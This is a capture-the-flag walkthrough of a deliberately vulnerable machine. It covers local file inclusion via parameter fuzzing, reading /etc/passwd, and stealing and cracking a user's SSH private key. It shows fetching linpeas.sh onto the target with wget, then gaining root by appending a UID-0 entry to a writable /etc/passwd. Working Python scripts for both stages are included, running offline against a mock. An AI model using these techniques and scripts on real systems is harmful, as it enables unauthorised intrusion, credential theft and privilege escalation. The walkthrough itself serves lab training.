1. Information gathering
Scan the network segment to find the target's IP.
Scan the target for open ports.
Probe the website: the front page gives away nothing.
Brute-force directories and files.
Visit the directories and files that were found.
robots.txt contains what looks like a person's name. Note it down and try brute-forcing SSH with it as the username; that gets nowhere.
A directory called secret/ also turns up; brute-forcing file names inside it with dirsearch finds nothing.
Open evl.php.
Blank page: the response body is empty.
With nothing else to go on, the remaining guess is that the script takes a parameter on the URL, which would point to a file inclusion vulnerability.
2. Exploiting the information
First fuzz the parameter name. index.html is a file known to exist, so use it as the value; wfuzz's --hw 0 hides responses whose body has 0 words, so only parameter names that actually return content are shown.
A response with content means the script accepts that parameter; next try reading sensitive files through it.
Swapping in other paths reads other files, which confirms a local file inclusion vulnerability.
Tried PHP stream wrappers (pseudo-protocols) to write a webshell through the include, but that fails, and remote file inclusion is not possible either.
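The fuzz-then-read procedure above, as an added example that is not part of the original write-up. It reproduces the wfuzz step in plain Python (try a list of parameter names with index.html as the value, drop every response with zero words, then read files through the parameter that responds, using ../ traversal) against a small mock of an include($_GET[...]) endpoint so that it runs offline. The mock, its accepted parameter name "file", the candidate list and the fake /etc/passwd are constructed assumptions, not details taken from the target.

```python
"""Parameter-name fuzzing for a suspected LFI endpoint (added example, offline).

Assumptions (not from the original page): the mock accepts the parameter name
"file" and resolves paths relative to /var/www/html/; the candidate wordlist
and the fake filesystem below are constructed.
"""
import posixpath
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

WEBROOT = "/var/www/html"
LFI_PARAM = "file"  # assumption: the parameter name the mock accepts

# Constructed fake filesystem served by the mock target.
FAKE_FS = {
    "/var/www/html/index.html": "<html><body>hello</body></html>\n",
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
        "mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash\n"
    ),
}

# Talk to 127.0.0.1 directly even if an http_proxy variable is set.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class LfiHandler(BaseHTTPRequestHandler):
    """Mimics include($_GET['file']): wrong parameter names return an empty body."""

    def do_GET(self):
        params = urllib.parse.parse_qs(urllib.parse.urlsplit(self.path).query)
        body = ""
        if LFI_PARAM in params:
            # include() resolves relative paths from the web root, so "../"
            # sequences walk out of it; normpath emulates that resolution.
            target = posixpath.normpath(posixpath.join(WEBROOT, params[LFI_PARAM][0]))
            body = FAKE_FS.get(target, "")
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_mock_server():
    """Starts the mock target on an ephemeral port; returns (server, base_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), LfiHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/secret/evl.php"


def fetch(base_url, param, value):
    """One GET with a single query parameter; returns the response body as text."""
    url = f"{base_url}?{urllib.parse.urlencode({param: value})}"
    with OPENER.open(url, timeout=5) as resp:
        return resp.read().decode(errors="replace")


def fuzz_params(base_url, candidates, probe="index.html"):
    """Equivalent of `wfuzz --hw 0`: keep names whose response has more than 0 words."""
    return [name for name in candidates if len(fetch(base_url, name, probe).split()) > 0]


def read_file(base_url, param, path):
    """Reads an arbitrary file through the confirmed parameter via path traversal."""
    return fetch(base_url, param, path)


if __name__ == "__main__":
    server, url = start_mock_server()
    try:
        candidates = ["cmd", "page", "file", "include", "path"]  # constructed wordlist
        found = fuzz_params(url, candidates)
        print("parameters that returned content:", found)
        for name in found:
            print(read_file(url, name, "../../../../etc/passwd"))
    finally:
        server.shutdown()
```

Against a real target, swap the base URL for the discovered evl.php and feed fuzz_params a proper wordlist (the Kali lists in the summary work); the zero-word filter is what turns a blank page into a usable oracle.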
Reading /etc/passwd through the LFI shows no H4x0r user (the name recorded earlier), but there is a user mowree. Port 22 (SSH) was open in the port scan, so check whether this user has an SSH key file.
A private key is found. Copy it out, save it, and brute-force its passphrase (converting the key with ssh2john and running john is the usual route).
SSH in as this user with the key (chmod 600 the copied key first, or ssh refuses to use it): success.
Check permissions, look at which files are readable and writable, and read the interesting ones.
Get flag1, then keep looking around.
LinPEAS is a script that searches for possible privilege escalation paths on Linux/Unix*/MacOS hosts.
Download it on the target: mowree@EvilBoxOne:~$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
3. Privilege escalation
LinPEAS reports that /etc/passwd is writable.
Idea: following the /etc/passwd line format, craft an account with UID 0 and GID 0 yourself, append it to /etc/passwd, and switch to it. Putting the password hash directly in the second field works because the system only consults /etc/shadow when that field is "x"; a hash there is used as-is.
Generate a password hash, append the entry, su to the new user, and get root.
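The user-enumeration check from section 2 and the writable-/etc/passwd escalation above, as one added example (not the author's code). It parses passwd-format text to list accounts with a real login shell, reimplements md5crypt (the $1$ scheme that mkpasswd --method=md5crypt produces) on top of hashlib so no external tool is needed, and appends a UID-0 entry whose hash sits directly in the password field. The account name "pwned", the password "my_pass" and the sample passwd content are constructed; the demo writes to a temporary copy, never to the real /etc/passwd.

```python
"""Writable /etc/passwd privilege escalation plus user enumeration (added example)."""
import hashlib
import os
import secrets
import tempfile

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Constructed sample passwd content (stands in for what the LFI returned).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash\n"
)


def login_users(passwd_text):
    """Usernames with a real login shell: the accounts worth checking for SSH keys."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NOLOGIN_SHELLS:
            users.append(fields[0])
    return users


def _to64(value, count):
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """glibc/FreeBSD md5crypt ($1$), the scheme behind mkpasswd --method=md5crypt."""
    pw, salt = password.encode(), salt[:8]
    s = salt.encode()
    ctx = hashlib.md5(pw + b"$1$" + s)
    alt = hashlib.md5(pw + s + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    i = len(pw)
    while i:  # one byte per bit of len(pw): NUL for a 1 bit, pw[0] for a 0 bit
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):  # fixed 1000 rounds of stretching
        ctx1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx1.update(s)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    encoded = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return f"$1${salt}${encoded}"


def root_entry(name, password, salt=None):
    """passwd line with the hash in field 2 (so /etc/shadow is never consulted), UID/GID 0."""
    if salt is None:
        salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    return f"{name}:{md5crypt(password, salt)}:0:0:root:/root:/bin/bash"


def append_entry(passwd_path, entry):
    """Appends the crafted line (on the target: /etc/passwd, then `su <name>`); returns the file."""
    with open(passwd_path, "a") as fh:
        fh.write(entry + "\n")
    with open(passwd_path) as fh:
        return fh.read()


def demo(name="pwned", password="my_pass"):
    """Runs the chain on a temporary copy of SAMPLE_PASSWD and returns the result."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_PASSWD)
    try:
        return append_entry(path, root_entry(name, password))
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("login users:", login_users(SAMPLE_PASSWD))
    print(demo())
```

On the real box the line is appended to /etc/passwd and `su pwned` with the chosen password gives a root shell. To confirm the reimplementation, compare md5crypt("my_pass", "12345678") with the output of `mkpasswd --method=md5crypt --salt=12345678 my_pass` (or `openssl passwd -1 -salt 12345678 my_pass`) on your own machine.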
Summary:
Directory scanning tools on Kali and their wordlists:
- /usr/share/wordlists/dirb/big.txt: 20469 lines
- /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt: 220560 lines
- /usr/share/dirb/wordlists/common.txt: 4614 lines (dirb's default wordlist)
- /usr/lib/python3/dist-packages/dirsearch/db/dicc.txt: number of lines
- /usr/share/seclists: a much larger collection that bundles many wordlists
mkpasswd: generate password hashes
- mkpasswd generates password hashes in the format stored in the shadow file.
- # Algorithm md5crypt, salt 12345678, password my_pass
- mkpasswd --method=md5crypt --salt=12345678 my_pass
- # $1$12345678$JklvlbDlb5LHHuzwbBK7f1